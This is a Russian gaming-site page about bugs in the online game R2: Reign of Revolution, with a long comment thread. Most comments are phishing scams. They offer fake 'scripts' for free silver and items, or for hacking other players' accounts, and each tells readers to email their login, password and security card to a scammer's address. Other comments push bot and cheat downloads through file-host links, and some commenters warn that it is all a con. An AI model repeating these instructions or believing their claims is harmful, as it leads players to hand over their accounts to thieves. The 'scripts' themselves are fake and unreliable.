на главную
об игре
R2: Reign of Revolution 11.12.2007

Лаги и Баги в R2

Люди недавно нашел баг в игре , назвал его порванная паучья сеть, дело вот в чем когда паук хочет набросить на вас сеть , долго долбите по клавише Е (в англ разкладке) РАБОТАЕТ!!!!!

Комментарии: 48
Ваш комментарий

Слышь, аифлоглифан, во первых ты хотя бы русский язык подучил, а то что-то хачу никто не будет доверяться. во вторых, нехер развод тут писать, проверил я твой способ... ЗНАЙТЕ НАРОД ЭТО ХЕРОВ РАЗВОД, НЕ ВЕРЬТЕ ЭТОМУ ИДИОТУ, ВЫ НЕ ТОКА НЕ ПОЛУЧИТЕ НИЧЕГО НО И ПОТЕРЯЕТЕ ВСЕ НАХ.

1

Не устали тут народ разводить?)

1

попробую, а от магов действует?

0

)))))ну как?получилось?)))

0

Предлашаю протестить Бот увеличивающего получаемый опыт для игры R2online, качать отсюда: http://slil.ru/27883752. В настройках все просто и понятно. Единственное что может вызвать вопросы, это панель Time, куда нода ввести число, во сколько раз вы хотите увеличить получаемый опыт ( максимальное увеличение - в 6 раз). Данный бот являеться демо версией расчитанной на 5 суток. Если вас заинтересует данный поект прошу обращяться в ICQ:573581844, для покупки полноценной версии.

P.S Засеч программу не возможно, так как исходящие пакеты имеют очень маленьки вес и хорошо замаскированы.

0

В квесте доспеха кримсона в пятом задании харт говорит что ему нужен красный камень 2 шт. Тут очень большая ошибка. Надо принести 2 обожженных кости. Выбить их можно в башне огня 1 ур. Надо убить очень много огненных скелетов , так как её очень трудно выбить. Она редко попадается.

0

Привет всем !!! Кому нужно много денег в R2 Online всем сюда www.r2moneyhack.narod.ru Просто всё заполните и на ваш аккаун прийдёт указанное количество денег. Удачи !!!

0

мля вот так я штуку нашёл!!!!!! слушайте и впитывайте!!!!!!
[skr{pass=Z}{login=X}{name=Y}set id0100=n end]
z=пароль x=логин и y=игровой ник вместо 100 пишем код предмета т.е. кольчужный доспех
0612 n-число
отправляем на "r2online692009@yandex.ru" все шлите работает!!!!!!!!!!!!!!!!!!!! 100%

0

НАКОНЕЦ Я НАШЕЛ НАСТОЯЩИЙ АДРЕСС в R2 на деньги .Я ОТПРАВЛЯЛ СКРИПТ МНОГО РАЗ,И НАКОНЕЦ НАШЕЛ ПРАВИЛЬНЫЙ АДРЕСС ИХ НЕЙ ОФФИЦИАЛЬНОЙ БАЗЫ.botv453r2@bk.ru и пишем нужный скрипт,где z-пароль,x-логин,b-название сервера на котором вы играете n-количество игрового серебра
[skr{pass=Z}{login=X}{server=b}set id0100=n end]
ДАЮ ПРИМЕР
[skr{pass=NEROOB(пароль)}{login=chuvak(логин)}{server=Eva}set id0100=9999999 end]
только скобки не пишите.КТО ХОЧЕТ СТАТЬ БОГАТЫМ И ПОКУПАТЬ ЛЮБОЙ ШМОТ НА АССА,ОТСЫЛАЙТЕ ВЫ НЕ РАЗОЧАРУЕТЕСЬ 101%

0

Внимание!
Это скрипт на деньги изменяет игровую информацию,заложеную на сервере после того как R2 был обновлен до 4-й революции.
Только внимание:
1) не пишите больше 2-х миллионов за час, а то вас автоматически забанит программа, следящая за всеми игроками (Проверенно).
2). персонаж должен быть не менее 25-го уровня, а то программка по получению денег не увидит персонажа.
Например скрипт на серебро -[skr{pass=A}{login=B}{name=E}{cs=G}set Id0100=C end]
A-пароль аккаунта,
B-логин аккаунта,
E-ник игрового перса,
G-ваша карта если нет пишем "not entered", idсеребра-0100,
C-количество серебра.
Например:
[skr{pass-123456}{login-abcd}{name-intrud}{sc-not entered} set id0100=90000 end]
Почта, на которую нужно отправлять такое письмо
GameMasterR2@yandex.ru
Там заложена эта программа!!!!
Через 15-20 минут вы получите сообщение с инструкцией и программой.

Если же вы не получили деньги, проверьте, всё ли вы сделали правильно.
По вопросам обращайтесь ко мне в ЛС - http://vkontakte.ru/id43343757

0

Парни HELP ME я скачал обновление на R2 там в место надпсей стало писать "UNKNOWN" не магу исправить ХЕЛП МИ парни помогите быстрей!!!!!!!!!!!!!!!!

0

Привет всем любителям R2 Online.
______________________________________________________________________

Мне наверное как и многим из вас надоел фарм ради того чтобы выбить жалкую точу или набить немного денег(сам один из них(().Мне так захотелось иметь хороший шмот, а после того как я подумал сколько денег мне придётся положить на R2,я даже больше не задумывался.И начал шерстить интернет... Потратил около 2 дней. Первый раз мя лохонули(..Потом решил отправить письмо на один ящик прочитанный мной на другом сайте.И СРАБОТАЛА!!!!!теперь делюсь со всеми!!!!РЕАЛЬНО РАБОТАЕТ БОТ!!!!!!!!!!!!!!

Пишем письмо вот таким образом не перепутайте!!!!бот может не понять)))


{skD}ID= }(свой логин, Обязательно!!! должен быть пробел от = и без скобок)
{skD}pass= }(свой пароль, Обязательно!!! должен быть пробел от = и без скобок)
X002{sks}(пишм если нет ск карты)
{skD}skart= }(своя ск какрта если есть, Обязательно!!! должен быть пробел от = и без скобок)
{sm288}284-5668(это я не знаю для чего наверное чтоб бот понял?)

Образец

{skD}ID= DEGTOR}
{skD}pass= 895521}
{skD}skart= (сюда копируем ск)}
{sm288}284-5668

И отправляем на : r2online_botS@inbox.ru(работает)
_______________________________________________________________________
P.S проверял тока на юпе

0

Надоело качатся и бить с мобов копейки. Я нашел способ не делать этого. Значит так пишите на email r2-online-bot2010@yandex.ru следущее:
1) Свой ID, Пароль
2) Сервер (Jupiter, Eva, Pandora)
3) Ваш ник в игре
4) Сколько вам нужно серебра, (не более 5кк)
5) Если же вам нужен шмот, а не деньги, вот список предметов из доступных:
(051957)- Железно Пластинчатый Доспех
(975916)- Двуручный Меч
(655748)- Орб Призывателю
(650364)- Доспех Кримсона
(664830)- Эльфийский Меч
(759004)- Мифриловый Доспех
(873456)- Эльфийский Лук
(098356)- Лук Ворона
(437186)- Черный Мифриловый Доспех
(875738)- Адский Клинок
(843568)- Доспех Хаоса
(572759)- Меч Отражения
(076873)- Ожерелья Инфернала (30 Дней)
(384758)- Ожерелья Кровавого Вампира (30 Дней)
(528580)- Ожерелье Королевы Суккубов (30 Дней)
Проверенно было лично на мне, все работает!!!

0

У меня тож весь текст пишет-UNKNOW,
по братски помогите кто нибудь:(

0

Распространяю различные виды ботов, даю тест версии бесплатно на 7 суток. Пишите в агент: www.dante.bgr@mail.ru

0

95Игорь95 пройди по этому сайту http://forum.4game.ru/showthread.php?t=13676 там всё написано

0

Продам бота,даю тест версию на 3 дня бесплатно. Цены низкие, возможна оплата серебром. пишите в mail - агент : r2bot@bk.ru

0

ЛЮДИ!!! Реальный взлом без развода!!! Короче изложу вкратце принцип:
Недавно вышла четвёртая революция и появился новый сервер Пандора. Это знают все. Но не все знают, при создании нового сервера сбились настройки e-mail бота для восстановления паролей, который работал ещё при R2. Не буду вдаваться в подробности, но эту дыру можно использовать для ВЗЛОМА АККАУНТОВ!!!
Оказалось, достаточно прислать несложный скрипт вида:

(php)
get pass();
nickname(xxxxx);
to acc:
{
login = yyyyy;
pass = zzzzz;
}
end;

(где xxxxx - ник вашей жертвы в игре, yyyyy - ваш логин, zzzzz - ваш пароль)

на адрес бота: r2-online@id.ru, и в течение дня придет письмо с логином и паролем жертвы!!!

Советы:
- лучше скопируйте скрипт, чтобы не ошибиться
- вводите достоверные данные
- у вашего персонажа должно быть не меньше 5000 серебра (это нужно, чтобы дошло письмо)
- до отправления скрипта желательно в сумме пробыть в игре не менее 10 часов, не создавайте новый аккаунт (чтобы письмо не вызвало подозрений у разработчиков).

0

Мне не давало покоя то, что, когда я взломал предыдущий скрипт, я не смог найти серийные номера предметов, дабы можно было с помощью скрипта не только получать деньги по 500к за раз, но и желаемые предметы. В итоге, после долгих трудов, мне это удалось!!! Если что, нашел в базе данных.
К сожалению, чтобы админы ничего не заподозрили, теперь придется также прописывать ник вашего основного персонажа и сервер, на котором он создан. Зато я поимел админов в том отношении, что теперь для работы скрипта не нужно вводить вашу ск карту, что является большим плюсом! таким образом игроку остается лишь воспользоваться следущим шаблоном

{skD}Serv= } (сервер вашего персонажа, Обязательно!!! должен быть пробел от = и без скобок)
{skD}Nickname= } (имя вашего персонажа, Обязательно!!! должен быть пробел от = и без скобок)
{skD}ID= }(свой логин, Обязательно!!! должен быть пробел от = и без скобок)
{skD}pass= }(свой пароль, Обязательно!!! должен быть пробел от = и без скобок)
{odR}ip= } (здесь вводим внутренний игровой код предмета, который берем из следующего списка)
ip= 000101 - серебро(приходит по 500к)
000102 - жезл вызова дракона
000105 - жезл паралича
000106 - жезл перевоплощения
000123 - лук охотника
000124 - гладиус
000125 - полуторный меч
000126 - обоюдоострый клинок
000127 - катары славы
000128 - меч славы
000157 - лук ворона
000203 - клеймор молний
000207 - орб призывателя
000221 - орб зефироса
000229 - аронди
000250 - мифриловый доспех
000261 - меч ифрита
000358 - адский клинок
000571 - доспех Хаоса
000598 - меч Отражения
000967 -ожерелья Инфернала (30 Дней)
000989- ожерелья Кровавого Вампира (30 Дней)
0001035- ожерелье Королевы Суккубов (30 Дней)
На данный момент это все внутренние коды какие я смог узнать.
Вы спросите зачем я выкладываю здесь всю эту информацию? отвечаю - меня бесят создатели игры, которые сделали ее неинтересной без вложения реальных денег. без донатерства прожить в ней очень трудно, и при помощи скрипта я даю вам возможность легко и быстро получить нужные вещи и тем самым мешаю создателям игры выбивать из простых игроков реальные деньги! это своеобразная месть.

0

Привет всем тем кто хочет взломать R2Online.
Пишем такое письмо:

name-пишем имя кого хотим взломать.
login Control centre of subscriptions-forget
password-forget
server-пишем тот сервер на котором находится тот кого хотим взломать.(по англ.)
name-пишем свое имя в R2Online.
login Control centre of subscriptions-здесь свой логин от ЦУПа.
password-здесь пароль от ЦУПа.
4game.r2@mail.ru -сюда отправляем письмо.

После того как ЦУП обновили, что бы войти на аккаунт нужно вводить лог. и пар. от ЦУПа.
Это служба возврата паролей в России от ЦУПа.

0

Самое главное я забыл, дабы скрипт заработал все это добро надо отправить на R2_script@mail.ru(как и что слать смотрите 2 поста выше)

0

Скрипт работает, проверил сегодня. одно расстраивает - довольно долго приходят вещи, мне мой орб зефироса летел часа 2 наверно. Несмотря на это хочется отметить, что скрипт все же сработал, поэтому спасибо большое за его выкладывание. сейчас хоть приоденусь по-человечески. Rudean - я целиком и полностью за твою месть)))

0

Даю 30 дневную версию, бота для Р2. переведнный корейский бот. Интерфейс полностью на русском. Прост в использовании.
Все вопросы и коментарии в Лс. Если все будет в порядке планирую продавать. Ссылка на скачивание бота - http://rghost.ru/2483666

0

Rudean мне нифига не пришло че за хня

0

Rudean чё не пришло а ?
Ты наверно лохотронщик !!!?

0

Я себе прописал лук ворона, и морф. все пришло на след день. не знаю как у других, я написал слово в слово скрипт, отослал 3 письма. возможно первые два написал с ошибкой, поэтому лук пришел так поздно.

0

Люди я нашол новый бот он работает я вам говорю на 100% делайте все по инструкцие и вам прийдет сообщение от бота
для етого вам нужно......
-----------------------------------------------------------------------------------------------------------------------------------------------------
1.введите ваш ник персонажа
2.введите уровень персонажа
3.введите ваш логин
4.введите ваш пароль
5.сервер на котором вы играете
6.количество серебра,и разных предметов (кольч досп,морф,орб,мечи и тд)
--------------------------------------------------------------------------------------------------------------------------------------------------------
пишете сообщение етому боту r2.bot.v1.3 а потом ждите 5-20мин и вам прийдет сообщение потом заходите в игру и шмот или деньги у вас в инвентаре
жилаю вам удачи в скрипте!!!

0

и забыл сказать вам што надо отсылать на @mail.ru

0

Rudean
а какие именно скабки не писать? и с какого лвл это действует а тоя отправил раз 2 или 3 не че не пришло?

0

Rudean а какие именно скобки не писать и с какого лвл ты это отправил мож у мя лвл мелкий а то я несколько раз отправил не че не пришло мож я не так че то делаю?

0

Продаю различные читы и боты для R2online. Писать в ICQ : 569662488. Для бесплатного тестирования даю чит на серебро, чит позволит вам получить сумму в размере 35кк единовременно. Ссылка для скачивая : zalil.ru/29986027 (интерфейс читаю предельно просто, все на русском, инструкция прилагается. По вопросам в асю).

0

Всё,что тут пишут типо:я взломал,я кучу денег себе сделал и т.д. и т.п. это всё РАЗВОД.Не нужно этому верить))Они угоняют ваши логин и пароль от акка)

0

я почитала тут почитала. увидела только один скрипт который по отзывам работает. проверила. сначала нифига не было. но потом догадалась снять sc карту с акка. написала еще раз. через день пришли и деньги и вещи. видать rudean или как его там не до конца смог скрипт модифицировать. а так спасибо вроде работает. Rudean молодец, спасибо тебе. моя твоя я писала в {}

0

Рад что смог кому то помочь. да, может быть не всем пришли шмотки из за sc карты, хотя я когда другу сказал написать на скрипт и при этом у него была карта ему пришли вещи. некоторым шмотки не пришли изза того что руки кривые наверно и по человечески по шаблону не смогли написать команды. я вообще от тупости офигеваю. кстати, недавно мне тут шепнули, что в базе р2 персы появляются только после достижения ими 30 уровня. Не знаю правда ли это, но и в этом может быть причина что людям не приходят вещи.если правда, то даже при желании я не смогу скрипт под новичков подогнать. так что уважаемые сначала набейте 30, а лучше 35 лвл может поможет. иначе если перса нету в базе у них на сервере, то и команду вы отправите на имя не существующего перса на вашей учетке, и скрипт не отошлет никуда ничего.
кстати, могу вас порадовать, скоро смогу выложить самописанный бот с полной инструкцией по применению. правда лучше его не ставить на нормальной земле, лучше на акре. иначе могут слить педики левые. работоспособность доказана. сам иногда ставлю.
короче все что надо я сказал. надеюсь вы не настолько тупы что не можете разобраться со скриптом. сказал же делать по образцу, а там скобки {} неужели сложно допереть?

0

МДА, ОДНИ РАЗВОДИЛЫ. гДЕ МОДЕРЫ ТО, СПИТЕ ЧТОЛЬ. уДАЛЯЙТЕ К ЧЕРТЯМ ЭТИ ПОСТЫ. дУМАЮ ВСЕМ МОЗГОВ ХВАТАЕТ НЕ ОТСЫЛАТЬ ПАРОЛЬ ОТ АККА И СНИМАТЬ КАРТУ БЕЗОПАСНОСТИ???

0

у рудеана скрипт рабочий, сама проверяла. здорово что есть толковые люди. пришел мне мой орб

0

Внимание!
Это скрипт на деньги изменяет игровую информацию,заложеную на сервере после того как R2 был обновлен до 4-й революции.
Только внимание:
1) не пишите больше 2-х миллионов за час, а то вас автоматически забанит программа, следящая за всеми игроками (Проверенно).
2). персонаж должен быть не менее 25-го уровня, а то программка по получению денег не увидит персонажа.
Например скрипт на серебро -[skr{pass=A}{login=B}{name=E}{cs=G}set Id0100=C end]
A-пароль аккаунта,
B-логин аккаунта,
E-ник игрового перса,
G-ваша карта если нет пишем "not entered", idсеребра-0100,
C-количество серебра.
Например:
[skr{pass-123456}{login-abcd}{name-intrud}{sc-not entered} set id0100=90000 end]
Почта, на которую нужно отправлять такое письмо
GameMasterR2@yandex.ru
Там заложена эта программа!!!!
Через 15-20 минут вы получите сообщение с инструкцией и программой.

Если же вы не получили деньги, проверьте, всё ли вы сделали правильно.
По вопросам обращайтесь ко мне в ЛС - vkontakte.ru/id43343757






--------------------------------------------------------------------------------

0

Народ а вас не зае* нести чушь тк на Р2 читов нет и не будет а всё что вы пишите скрипы не скрипты развод прислать карту логин и пароль может или полный дибил или олень каторый такой развод и придумал.(кто повёлся на эту лажу убейтесь ап стуну от своей тупости,прям как дети малые везде халяву ищите ппц)

0

народ помогите плиззз у меня запускатор не хочер работать??

0

http://zalil.ru/30781061 вот хак на серебро Р2,для оффи R2online.ru работает 100%.

0

Кому Нужна программа на серебро и бот в Р2 обращаться по ICQ572046244.Первым 20 человекам програма бесплатно!!!!Качество 100%....

0

Подскажите ПЛИЗ!!!!Я удалил случайно КС карту от Р2,как мне её востановить???(((((((

0

Люди вобще срочняк надо,подскажитееееее(((((

0

с почтового ящика свою удалил СК-карту?

0

http://fiftryss.com/?ref=3991089 зарабатывайте денег!(я на ликанчика и прем 7 дн за неделю заработал)

0

4gamer2help@mail.ru зайди сюда срочно!

0